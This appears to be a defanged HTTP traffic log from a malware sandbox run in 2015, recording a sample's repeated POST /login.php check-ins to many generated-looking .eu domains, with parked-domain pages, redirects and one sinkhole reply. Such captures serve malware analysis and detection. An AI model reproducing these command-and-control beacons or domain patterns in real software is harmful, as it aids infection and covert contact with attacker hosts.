'fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQwMTF8fGJ1Y2tldDA0N3x8fHw1NjRlZTM0NTljY2U2fHx8MTQ0ODAxMDU2NS42NzQ2fGI2NDQ2N2RkZTVhMjJmNjdiZjYyYWMwZmNlYjM1OTU3ODdiOTBiMzV8fHx8fDF8fHwwfDU2NGVlMzQ1MTU1MzVmMDMyOThiNjNkYnx8fDB8fHx8fHwwfHx8fHx8fHx8';</script>..</head>..<body>...<script type='text/javascript' language='JavaScript'>.window.onload = function() {..if(clickTracking && typeof track_onclick == 'function') track_onclick("899acbee21dc3d6ea9c8cc64f2f4d6bff340bcc0");..top.location.href = "http:/
<<< skipped >>>
GET / HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ww62.norumikemem.eu
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 20 Nov 2015 09:18:28 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Check: 3c12dc4d54f8e22d666785b733b0052100c53444
X-Language: english
X-Template: tpl_CleanPeppermintBlack_twoclick
5f7..<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "hXXp://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="hXXp://VVV.w3.org/1999/xhtml">..<head>...<title>norumikemem.eu</title>...<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>...<script type='text/javascript' language='JavaScript'>.var domain = 'norumikemem.eu';.var uniqueTrackingID = 'MTQ0ODAxMDU0NC40NDU3Ojk4OTkwOGUwMWZmNTQxYTZlOTU2MjFhZDcwNTI2MzFlZjVhZDY3MmRkMWVhMjk5ODc1NjY5YzYxYzI2ZWVkY2Y6NTY0ZWUzMzA2Y2QyMQ==';.var clickTracking = false;.var themedata = '';.var xkw = '';.var xsearch = '';.var xpcat = '';.var rxid = '';.var bucket = '';.var clientID = '';.var clientIDs = '';.var num_ads = 0;.var adtest = 'off';.var scriptPath = '';...</script>...<script src='hXXp://parkingcrew.net/assets/scripts/js3.js' type='text/javascript' language='JavaScript'></script>...<script type='text/javascript' language='JavaScript'>themedata = 'fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQwMTF8fGJ1Y2tldDA0OHx8fHw1NjRlZTMzMDZiMjczfHx8MTQ0ODAxMDU0NC40NTI0fDNjMzU2MWFjNGM5NmZlYTAzNTljY2M3YjRiODJhNTk0NWU3ZjZmNDB8fHx8fDF8fHwwfDU2NGVlMzMwMTM1MzVmNzI0MjhiNGZhZXx8fDB8fHx8fHwwfHx8fHx8fHx8';</script>..</head>..<body>...<script type='text/javascript' language='JavaScript'>.window.onload = function() {..if(clickTracking && typeof track_onclick == 'function') track_onclick("899acbee21dc3d6ea9c8cc64f2f4d6bff340bcc0");..top.location.href = "http:/
<<< skipped >>>
GET / HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ww62.lyvufixyvet.eu
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 20 Nov 2015 09:19:04 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Check: 3c12dc4d54f8e22d666785b733b0052100c53444
X-Language: english
X-Template: tpl_CleanPeppermintBlack_twoclick
5f7..<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "hXXp://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="hXXp://VVV.w3.org/1999/xhtml">..<head>...<title>lyvufixyvet.eu</title>...<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>...<script type='text/javascript' language='JavaScript'>.var domain = 'lyvufixyvet.eu';.var uniqueTrackingID = 'MTQ0ODAxMDU4MC41MzMxOmEzZmNhYWY4MGRlNmIyZGZjZjU4MjkwZWY2OWNiY2U2Y2IwYThmNTFkYzdiOTQxYzE2ZGI5NmY4YzY5Nzk4ZmI6NTY0ZWUzNTQ4MjI4Nw==';.var clickTracking = false;.var themedata = '';.var xkw = '';.var xsearch = '';.var xpcat = '';.var rxid = '';.var bucket = '';.var clientID = '';.var clientIDs = '';.var num_ads = 0;.var adtest = 'off';.var scriptPath = '';...</script>...<script src='hXXp://parkingcrew.net/assets/scripts/js3.js' type='text/javascript' language='JavaScript'></script>...<script type='text/javascript' language='JavaScript'>themedata = 'fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQwMTF8fGJ1Y2tldDA0N3x8fHw1NjRlZTM1NDgxMWQzfHx8MTQ0ODAxMDU4MC41Mzh8YTRlZWY3YmVhYjlkNjk3YmFmNWI0MzhlYzM2YTRiNWYxMDkxMDU4NHx8fHx8MXx8fDB8NTY0ZWUzNTQ4OGZiY2UxYWFmOGI0OWE0fHx8MHx8fHx8fDB8fHx8fHx8fHw=';</script>..</head>..<body>...<script type='text/javascript' language='JavaScript'>.window.onload = function() {..if(clickTracking && typeof track_onclick == 'function') track_onclick("899acbee21dc3d6ea9c8cc64f2f4d6bff340bcc0");..top.location.href = "http:/
<<< skipped >>>
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: lyvufixyvet.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 302 Found
Server: nginx
Date: Fri, 20 Nov 2015 08:22:10 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.4.36-0 deb7u3
Location: hXXp://ww62.lyvufixyvet.eu
Vary: Accept-Encoding
GET /zcvisitor/56383af2-8f66-11e5-9f3b-06d3db30a525 HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ze1.zeroredirect1.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, pre-check=0, post-check=0
content-security-policy: default-src 'self'; script-src 'self' 'unsafe-inline'
x-content-security-policy: default-src 'self'; script-src 'self' 'unsafe-inline'
X-WebKit-CSP: default-src 'self'; script-src 'self' 'unsafe-inline'
Content-Type: text/html;charset=UTF-8
Transfer-Encoding: chunked
Date: Fri, 20 Nov 2015 09:08:59 GMT
Server: ZeroPark-Traffic
3ed..<!DOCTYPE html>.<html>..<head>...<META http-equiv="refresh" content="1;URL='hXXp://ze1.zeroredirect2.com/zcredirect?visitid=56383af2-8f66-11e5-9f3b-06d3db30a525&type=meta'">..</head>..<body>...<script type="text/javascript">....setTimeout(function () {.....var pageWidth = window.innerWidth ? window.innerWidth : (document.documentElement && document.documentElement.clientWidth ? document.documentElement.clientWidth : document.getElementsByTagName('body')[0].clientWidth);.....var pageHeight = window.innerHeight ? window.innerHeight : (document.documentElement && document.documentElement.clientHeight ? document.documentElement.clientHeight : document.getElementsByTagName('body')[0].clientHeight);.....var iframeDetected = window.self !== window.top;.....window.location="hXXp://ze1.zeroredirect2.com/zcredirect?visitid=56383af2-8f66-11e5-9f3b-06d3db30a525&type=js&browserWidth=" pageWidth "&browserHeight=" pageHeight "&iframeDetected=" iframeDetected;....}, 1);...</script>..</body>.</html>..0..
<<< skipped >>>
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: nozulufynax.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 302 Found
Server: nginx
Date: Fri, 20 Nov 2015 08:21:52 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.4.36-0 deb7u3
Location: hXXp://ww62.nozulufynax.eu
Vary: Accept-Encoding
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: nozulufynax.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 302 Found
Server: nginx
Date: Fri, 20 Nov 2015 08:21:55 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.3.10-1ubuntu3.11
Location: hXXp://ww62.nozulufynax.eu
Vary: Accept-Encoding
GET /90623dde15463e9fb45001ad5063db65 HTTP/1.1
Host: xsso.nopegymozow.eu
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Cookie: btst=c5be0b98ef08bd0e96394b12a6af6382|194.242.96.218|1448010539|1448010539|0|1|0; snkz=194.242.96.218
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 20 Nov 2015 09:09:00 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: anbtr=90623dde15463e9fb45001ad5063db65; domain=.nopegymozow.eu
19..Landed nopegymozow.eu<br>..0..
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: digivehusyd.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 200 OK
Connection: close
Set-Cookie: jsessionid=e90c55b2c9a14c217bf26ca73db4527f; Expires=Fri, 18 Nov 2022 09:08:59 GMT
Date: Fri, 20 Nov 2015 09:08:59 GMT
Content-Length: 0
Content-Type: text/plain; charset=utf-8
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: qetuluvolos.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 302 Found
Server: nginx
Date: Fri, 20 Nov 2015 08:21:39 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.4.36-0 deb7u3
Location: hXXp://ww62.qetuluvolos.eu
Vary: Accept-Encoding
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: qetuluvolos.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 302 Found
Server: nginx
Date: Fri, 20 Nov 2015 08:21:43 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.3.10-1ubuntu3.11
Location: hXXp://ww92.qetuluvolos.eu
Vary: Accept-Encoding
GET /domain/rynazuqihoj.eu HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: sso.anbtr.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Fri, 20 Nov 2015 09:09:00 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: anbtr=f2c2596452aa9379694886959d3b2888; domain=.rynazuqihoj.eu
Location: hXXp://xsso.rynazuqihoj.eu/f2c2596452aa9379694886959d3b2888
3e..Go hXXp://xsso.rynazuqihoj.eu/f2c2596452aa9379694886959d3b2888..0..
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: galokusemus.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 302 Found
Server: nginx
Date: Fri, 20 Nov 2015 08:21:30 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.4.36-0 deb7u3
Location: hXXp://ww62.galokusemus.eu
Vary: Accept-Encoding
GET /4abc123f5bc1fe014bbeb686d9306960 HTTP/1.1
Host: xsso.marytymenok.eu
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Cookie: btst=50f0100787987c2c428a9f0fa37a4606|194.242.96.218|1448010539|1448010539|0|1|0; snkz=194.242.96.218
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 20 Nov 2015 09:09:00 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: anbtr=4abc123f5bc1fe014bbeb686d9306960; domain=.marytymenok.eu
19..Landed marytymenok.eu<br>..0..
GET /domain/vofozymufok.eu HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: sso.anbtr.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Fri, 20 Nov 2015 09:08:59 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: anbtr=519227042aaa4d45b3d8d04c6d6182c2; domain=.vofozymufok.eu
Location: hXXp://xsso.vofozymufok.eu/519227042aaa4d45b3d8d04c6d6182c2
3e..Go hXXp://xsso.vofozymufok.eu/519227042aaa4d45b3d8d04c6d6182c2..0..
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: rynyhipexon.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 302 Found
Server: nginx
Date: Fri, 20 Nov 2015 08:22:11 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.3.10-1ubuntu3.11
Location: hXXp://ww92.rynyhipexon.eu
Vary: Accept-Encoding
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: dimutobihom.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 302 Found
Server: nginx
Date: Fri, 20 Nov 2015 08:21:30 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.3.10-1ubuntu3.11
Location: hXXp://ww92.dimutobihom.eu
Vary: Accept-Encoding
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: norumikemem.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 302 Found
Server: nginx
Date: Fri, 20 Nov 2015 08:21:34 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.4.36-0 deb7u3
Location: hXXp://ww62.norumikemem.eu
Vary: Accept-Encoding
GET /f2c2596452aa9379694886959d3b2888 HTTP/1.1
Host: xsso.rynazuqihoj.eu
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Cookie: btst=db559cd2ebfad778907f69945582240c|194.242.96.218|1448010539|1448010539|0|1|0; snkz=194.242.96.218
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 20 Nov 2015 09:09:00 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: anbtr=f2c2596452aa9379694886959d3b2888; domain=.rynazuqihoj.eu
19..Landed rynazuqihoj.eu<br>..0..
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: qebahilojam.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 302 Found
Server: nginx
Date: Fri, 20 Nov 2015 08:21:34 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.3.10-1ubuntu3.11
Location: hXXp://ww62.qebahilojam.eu
Vary: Accept-Encoding
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: jewuqyjywyv.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Fri, 20 Nov 2015 09:08:59 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://sso.anbtr.com/domain/jewuqyjywyv.eu
Set-Cookie: btst=2eb3e8e51e54041546311d246b6dd730|194.242.96.218|1448010539|1448010539|0|1|0
Set-Cookie: snkz=194.242.96.218
0..
GET /71c55851e5901a95263b027885fa0411 HTTP/1.1
Host: xsso.jewuqyjywyv.eu
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Cookie: btst=2eb3e8e51e54041546311d246b6dd730|194.242.96.218|1448010539|1448010539|0|1|0; snkz=194.242.96.218
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 20 Nov 2015 09:09:01 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: anbtr=71c55851e5901a95263b027885fa0411; domain=.jewuqyjywyv.eu
19..Landed jewuqyjywyv.eu<br>..0..
GET / HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ww92.qekikyvutic.eu
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 20 Nov 2015 09:09:19 GMT
Server: Apache
Set-Cookie: vsid=909vr1955561591417248; expires=Wed, 18-Nov-2020 09:09:19 GMT; path=/; domain=ww92.qekikyvutic.eu; httponly
X-Frame-Options: DENY
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4 L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_ikED3u47J16sfIBRasIHmX4ZsQVGoKi HPfV1RPTbc I2lTVX nUNgDONyylJP dZ/iuNF1ubDmxIRIzn81MNA==
Vary: Accept-Encoding,User-Agent
Content-Length: 1686
Keep-Alive: timeout=5, max=74
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC> <html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4 L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_ikED3u47J16sfIBRasIHmX4ZsQVGoKi HPfV1RPTbc I2lTVX nUNgDONyylJP dZ/iuNF1ubDmxIRIzn81MNA==" >..<head>.. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.. <title>ww92.qekikyvutic.eu</title>.. <style type="text/css">*{margin:0; padding:0; border: 0; overflow:hidden} html, body {height: 100%;}</style>..</head>..<body width="100%" height="100%">..<noscript><meta http-equiv="refresh" content="0;url=hXXp://imptestrm.com/rg-erdr.php?_dnm=ww92.qekikyvutic.eu&_cfrg=1&_drid=as-drid-2396656235494782" /><center><p style="padding:1em; font-size:1.5em;">For search results please <a href="hXXp://imptestrm.com/rg-erdr.php?_dnm=ww92.qekikyvutic.eu&_cfrg=1&_drid=as-drid-2396656235494782" style="text-decoration:underline; color:#0000EE;">CLICK HERE</a>.</p></center></noscript>..<div id="rmgblock" width="100%" height="100%"></div>..<script type="text/javascript" src="hXXp://imptestrm.com/rg-main.php?folio=9POY552X5&dmn=ww92.qekikyvutic.eu"></script>..<script type="text/javascript" language="JavaScript" src="hXXp://pagead2.googlesyndication.com/apps/domainpark/show_afd_ads.js"></script>..<script type="text/javascript"> function collectHeight(){try{var e=Math.max(document.documen
<<< skipped >>>
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: qexofyqihid.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 302 Found
Server: nginx
Date: Fri, 20 Nov 2015 08:21:34 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.4.36-0 deb7u3
Location: hXXp://ww92.qexofyqihid.eu
Vary: Accept-Encoding
GET / HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ww62.puregivytoh.eu
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 20 Nov 2015 09:18:27 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Check: 3c12dc4d54f8e22d666785b733b0052100c53444
X-Language: english
X-Template: tpl_CleanPeppermintBlack_twoclick
5f7..<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "hXXp://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="hXXp://VVV.w3.org/1999/xhtml">..<head>...<title>puregivytoh.eu</title>...<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>...<script type='text/javascript' language='JavaScript'>.var domain = 'puregivytoh.eu';.var uniqueTrackingID = 'MTQ0ODAxMDU0My40MTgxOjZlM2E5MWJiY2MzZjAxNTY1ZmNmM2ZjNGIyNGFjMmMyYjRlZTFhMTJlZDFlNTI4ZGUxODRhOWVlMTNiYTViYTE6NTY0ZWUzMmY2NjE2Mw==';.var clickTracking = false;.var themedata = '';.var xkw = '';.var xsearch = '';.var xpcat = '';.var rxid = '';.var bucket = '';.var clientID = '';.var clientIDs = '';.var num_ads = 0;.var adtest = 'off';.var scriptPath = '';...</script>...<script src='hXXp://parkingcrew.net/assets/scripts/js3.js' type='text/javascript' language='JavaScript'></script>...<script type='text/javascript' language='JavaScript'>themedata = 'fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQwMTF8fGJ1Y2tldDA0N3x8fHw1NjRlZTMyZjY1MGFmfHx8MTQ0ODAxMDU0My40MjJ8NWVhN2YzMjZmNjRmYWVhOTY0M2U3MGZkMzZlNzg5OTA3MmU4NTliN3x8fHx8MXx8fDB8NTY0ZWUzMmY4YWJmODJjZjM3OGI2MGFmfHx8MHx8fHx8fDB8fHx8fHx8fHw=';</script>..</head>..<body>...<script type='text/javascript' language='JavaScript'>.window.onload = function() {..if(clickTracking && typeof track_onclick == 'function') track_onclick("899acbee21dc3d6ea9c8cc64f2f4d6bff340bcc0");..top.location.href = "http:/
<<< skipped >>>
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: cihunemyror.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 200 OK
X-Sinkhole: Malware sinkhole
Content-Type: text/html
Server: nginx/0.7.65
Date: Fri, 20 Nov 2015 09:09:00 GMT
Content-Length: 0
GET / HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ww92.tufecagemyl.eu
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 20 Nov 2015 09:09:05 GMT
Server: Apache
Set-Cookie: vsid=910vr1955561452511509; expires=Wed, 18-Nov-2020 09:09:05 GMT; path=/; domain=ww92.tufecagemyl.eu; httponly
X-Frame-Options: DENY
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4 L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_OAueoF3VxCXminZtCrSbUeaf/HsDdgnWFFNicfj0QmcpipVXgcsNGkjQHOYkS1zFBlgqBQ6yeTW/FUkZ/HPU5g==
Vary: Accept-Encoding,User-Agent
Content-Length: 1686
Keep-Alive: timeout=5, max=106
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC> <html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4 L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_OAueoF3VxCXminZtCrSbUeaf/HsDdgnWFFNicfj0QmcpipVXgcsNGkjQHOYkS1zFBlgqBQ6yeTW/FUkZ/HPU5g==" >..<head>.. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.. <title>ww92.tufecagemyl.eu</title>.. <style type="text/css">*{margin:0; padding:0; border: 0; overflow:hidden} html, body {height: 100%;}</style>..</head>..<body width="100%" height="100%">..<noscript><meta http-equiv="refresh" content="0;url=hXXp://imptestrm.com/rg-erdr.php?_dnm=ww92.tufecagemyl.eu&_cfrg=1&_drid=as-drid-2396656235494782" /><center><p style="padding:1em; font-size:1.5em;">For search results please <a href="hXXp://imptestrm.com/rg-erdr.php?_dnm=ww92.tufecagemyl.eu&_cfrg=1&_drid=as-drid-2396656235494782" style="text-decoration:underline; color:#0000EE;">CLICK HERE</a>.</p></center></noscript>..<div id="rmgblock" width="100%" height="100%"></div>..<script type="text/javascript" src="hXXp://imptestrm.com/rg-main.php?folio=9POY552X5&dmn=ww92.tufecagemyl.eu"></script>..<script type="text/javascript" language="JavaScript" src="hXXp://pagead2.googlesyndication.com/apps/domainpark/show_afd_ads.js"></script>..<script type="text/javascript"> function collectHeight(){try{var e=Math.max(document.documen
